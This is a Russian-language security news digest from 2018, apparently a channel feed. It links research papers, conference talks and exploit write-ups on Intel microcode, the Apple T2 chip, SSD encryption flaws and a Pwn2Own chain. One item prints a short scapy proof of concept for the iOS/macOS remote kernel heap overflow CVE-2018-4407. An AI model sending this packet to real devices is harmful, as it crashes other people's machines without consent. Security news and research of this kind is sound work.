Микрокод (абстрактый слой микроархитектуры) процессоров Intel является одним из самых закрытых компонентов современных микропроцессоров. Немного пролили свет на его внутреннее устройство исследователи из университета Ruhr-Universität Bochum в своем исследовании "An Exploratory Analysis of Microcodeas a Building Block for System Defenses".
https://www.syssec.rub.de/media/emma/veroeffentlichungen/2018/08/20/constructive_ucode-CCS18.pdf
https://github.com/RUB-SysSec/Microcode

Выложили в общий доступ видео всех докладов основного трека конферении DEF CON 26 https://www.youtube.com/playlist?list=PL9fPq3eQfaaD0cf5c7wkzMoj2kifzGO4U

Зарелизили видео докладов с конференции BlueHat, которая прошла в прошлом месяце https://www.youtube.com/playlist?list=PLXkmvDo4MfuugCoJZaNhWZjgEXeXZgaQR

Apple выложила небольшую статью с подробностями о чипе T2, который сейчас является основных корнем доверия в системе. T2 сильно усложняет атаки на Secure Boot, шифрование FileVault и Secure Enclave (SEP) сопроцессор. Я бы сказал, что на данный момент с точки зрения безопасности прошивки на новых платформах, Apple сильно впереди других вендоров железа https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf

Phrack один из старейших ezine изданий, который зарелизил первый выпуск аж в 1985 году. Здорово, что до сих пор авторитет и качество публикаций этого электронного издания на высоте. Вот и сегодня на сайте phrack опубликована новая статья ”Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability” на которую стоит обратить внимание http://www.phrack.org/papers/viewer_discretion_advised.html

Хорошая книга "Mathematics of Public Key Cryptography" по основам крипторафии с открытым ключем доступна в общем доступе по желанию автора https://www.math.auckland.ac.nz/~sgal018/crypto-book/crypto-book.html

Интересное видео доклада «Effective Memory Safety Mitigations» от Криса Рольфа https://www.youtube.com/watch?v=Q379iWqmodM

iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC в несколько строк:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

Любопытный доклад "Smartphone Privacy: How Your Smartphone Tracks Your Entire Life" на тему смартфонов и прайваси. В современном мире пользователь все чаще сам становится продуктом для корпораций, а точнее источником данных. Прежде чем подключаться к очередному бесплатному сервису задумайтесь, что движет компанией, которая его производит? Бесплатного ничего в этом мире нет и компаний альтруистов не существует даже в благотворительности! https://conference.hitb.org/hitbsecconf2018pek/materials/D2T2%20-%20How%20Your%20Smartphone%20Tracks%20Your%20Entire%20Life%20-%20Vladimir%20Katalov.pdf

Интересные новости сегодня вокруг безопасности жестких дисков и технологий полно дискового шифрования. В исследовании "Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs)" обсуждается технология TCG Opal, которую по большей части разработал Intel и внедрил в качестве "безопасного" прокси-интерфейса во всех современных прошивках BIOS. Так вот, к примеру MS Win10 и технология Bitlocker не использует дополнительного шифрования на современных SSD, а только интегрируется со встроенной TCG Opal, что при указанных в исследовании уязвимостях создает возможность для атаки на пароль доступа к жесткому диску. Так же в исследовании говорится о уязвимостях непосредственно в прошивках SSD дисков от Crucial и Samsung, которые при наличие физического доступа позволяют при помощи отладочных интерфейсов успешно обойти часть проверок безопасности. Эти новости все больше наводят на мысли о том, что разработчик ОС должен контролировать полностью и железо, так как без этого всегда найдется уязвимое звено именно там.

https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf

https://link.medium.com/ELPjoikaCR

https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/

Пятнадцатая встреча DEFCON Moscow состоится 10 и 11 ноября. Приходи!

15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!

https://xakep.ru/2018/11/07/dc7499/

🔥НОВОСТЬ-ОГОНЬ🔥Финальная программа ZeroNights 2018 — для вас!

Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.

До встречи: https://2018.zeronights.ru/program/.

Сегодня Samuel Groß зарелизил свою зксплойт связку (Safari + macOS), которую он использовал для победы в конкурсе Pwn2Own 2018 в начале этого года. Отличное пошаговое описание и код для всей цепочки эксплойтов.

stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018

Что мотивирует исследователей разглашать уязвимости без патчей в Full Disclosure? Причин может быть масса, это и нерасторопность вендоров в выпуске патчей, и отсутствие bug bounty или же просто стремление сделать мир лучше без ожидания возможности опубликовать свой ресеч после патча.

На днях исследователь @MorteNoir опубликовал отличный детальный блог "Full disclosure: 0day-уязвимость побега из VirtualBox", где рассказал о интересном векторе эксплуатации виртуального устройства сетевой карты, который приводит к побегу из guest виртуальной машины в host ОС.

https://habr.com/post/429004/

Богата эта неделя на отличные описания уязвимостей вот вам еще один (CVE-2018-4331) на который стоит обратить внимание "An introduction to exploiting userspace race conditions on iOS" https://bazad.github.io/2018/11/introduction-userspace-race-conditions-ios/

Вы все еще думаете, что импланты в кабелях зарядки для смартфонов это удел шпионских фильмов? Остерегайтесь случайных зарядок в публичных местах ;-)

А вот вам реальный пример атаки BadUSB через зарядку для iPhone на Macbook Air 😈

Видео всех докладов конференции Black Hat Vegas 2018 доступны онлайн! https://youtube.com/playlist?list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe

Хотите понять в деталях, как устроено E2E шифрование в Signal, смотрите это видео https://www.youtube.com/watch?v=DXv1boalsDI

Интересную мысль на днях высказал известный эксперт Брюс Шнайер. Она заключается в том, что становится все больше софта, который не так-то просто пропатчить. Мы уже привыкли к парадигме быстрой разработки и бесконечного цикла улучшения софта посредством доставки обновлений. Но вдумайтесь в современном мире становится все больше софта, куда доставка обновлений является проблемой. Например, самолеты, автомобили, критическая инфраструктура, промышленное оборудование, кардио стимуляторы и куча всего остального в том же духе. В большинстве случаев мы просто не обновляем подобного рода софт, но ведь баги от этого живут там годами. Отличным примером послужили недавние массовые эпидемии WannaCry по всему миру. Все это наводит на интересные мысли, о том что текущие парадигмы разработки софта требуют пересмотра, по крайней мере в некоторых её областях 😈 https://motherboard.vice.com/amp/en_us/article/439wbw/patching-is-failing-as-a-security-paradigm?__twitter_impression=true